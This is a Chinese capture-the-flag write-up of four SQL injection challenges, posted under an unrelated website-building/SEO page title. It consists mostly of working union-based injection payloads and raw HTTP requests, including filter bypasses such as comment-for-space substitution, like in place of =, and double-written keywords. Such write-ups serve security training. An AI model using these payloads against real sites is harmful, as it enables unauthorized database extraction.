河北省网站建设_网站建设公司_Figma_seo优化

首页 / 建站日记 / 河北省网站建设_网站建设公司_Figma_seo优化
河北省网站建设_网站建设公司_Figma_seo优化
2025/12/31 19:38:16 网站建设 项目流程

1,[SWPUCTF 2021 新生赛]easy_sql

?wllm=-1' order by 3--+
?wllm=-1' order by 4--+

回显示为?wllm=-1' union select 1,2,3--+

?wllm=-1' union select 1,2,database()--+

库名是test_db

4.查看test_db库的表

?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

查看段

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+

查看flag

-1' union select 1,2,group_concat(id,flag) from test_tb--+


2,

先判断注入类型

发现是1)))))

order by发现有两个回显示

显示数据库到第二个回显示

id=1))))))%20union%20select%201,group_concat(schema_name)%20from%20information_schema.schemata%20--+

表名

1)))))) union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining' --+

ctftraining 库中发现一个叫 flag 的表。

列名

1)))))) union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctftraining' --+

找到对应的字符

1)))))) UNION SELECT 1, flag FROM ctftraining.flag; --+

3[SWPUCTF 2021 新生赛]sql
和之前一样但是我们发现这里有前端的提示不能用 oder by

因为空格和空格的 URL 中的特殊编码字符(+ 号作为)被禁用

在 SQL 注入防护中,很多系统会对特殊字符进行过滤,+ 号作为 URL 中的特殊编码字符,也可能被目标系统直接拦截或转义,导致 --+ 无法完整传递到数据库,自然无法发挥注释作用。

到这里之后开始union注入,发现 = 也是被检测的,可以使用like来代替 =

?wllm=-1'union/**/select/**/1,2,3%23

查表名

?wllm=-1%27union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema/**/like(database())%23

查字段

?wllm=-1'union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name/**/like("LTLT_flag")%23


查flag(发现不全)

?wllm=-1'union/**/select/**/1,group_concat(flag),3/**/from/**/LTLT_flag%23

NSSCTF{d064d030-12fb

用mid分段查

前面

?wllm=-1%27union/**/select/**/1,mid((select/**/flag/**/from/**/LTLT_flag),1,30),3%23

?wllm=-1'union/**/select/**/1,mid((select/**/flag/**/from/**/LTLT_flag),21,41),mid((select/**/flag/**/from/**/LTLT_flag),42,62)%23

四,[SWPUCTF 2022 新生赛]ez_sql
get

GET /?nss=1 HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i

让用post传参

改内容如下

POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

nss=1

查列数

POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

nss=-1'/**/oorrder/**/by/**/4#

三没有报错

发现union被过滤,双写union绕过

POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

nss=-1/**/uunionnion/**/select/**/1,2,database()#

POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

nss=nss=4'/**/ununionion/**/select/**/1,database(),3;#

POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 146

nss=2'/**/ununionion/**/select/**/1,database(),group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema='NSS_db';#


POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 146

nss=2'/**/ununionion/**/select/**/1,database(),group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb';#

POST / HTTP/1.1
Host: node5.anna.nssctf.cn:24561
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1764348351,1766929347
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

nss=2'/**/ununionion/**/select/**/1,group_concat(Secr3t),group_concat(flll444g)/**/from/**/NSS_tb;#

标签: 网站建设 企业官网 项目流程 UI设计 前端开发

热门文章

文章分类

标签云

网站建设 响应式设计 用户体验 SEO优化 前端开发 小程序 电商平台 性能优化

相关文章

您可能感兴趣的其他内容

YOLOv8 Virtual Adversarial Training对抗扰动生成
2025/12/31 19:38:16 网站建设

YOLOv8 Virtual Adversarial Training对抗扰动生成

YOLOv8 Virtual Adversarial Training对抗扰动生成 在智能监控、自动驾驶和工业质检等现实场景中,目标检测模型不仅要“看得准”,更要“扛得住”——图像中的轻微模糊、光照变化或传感器噪声,都可能让一个高精度模型突然失效。YOLOv8 作为当…...

阅读更多 →
大语言模型/(大数据模型)创建测试用例教程详解--通用版教程
2025/12/31 19:37:40 网站建设

大语言模型/(大数据模型)创建测试用例教程详解--通用版教程

1. 什么是基于LLM的测试用例生成(序号1可省略) 。大语言模型(LLM)能够理解需求描述、代码结构和测试逻辑,自动生成高质量、多样化的测试用例。这种方法可以: 。提高测试覆盖率:发现人工可能遗漏的边界情况 。提…...

阅读更多 →
YOLOv8 ShuffleNet V2高速推理适配尝试
2025/12/31 19:37:40 网站建设

YOLOv8 ShuffleNet V2高速推理适配尝试

YOLOv8 ShuffleNet V2高速推理适配尝试 在边缘计算设备日益普及的今天,如何让目标检测模型既“跑得动”又“看得准”,成了智能系统设计的核心挑战。尤其是在树莓派、Jetson Nano这类算力有限的硬件上部署YOLOv8时,开发者常常面临内存溢出、帧…...

阅读更多 →

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询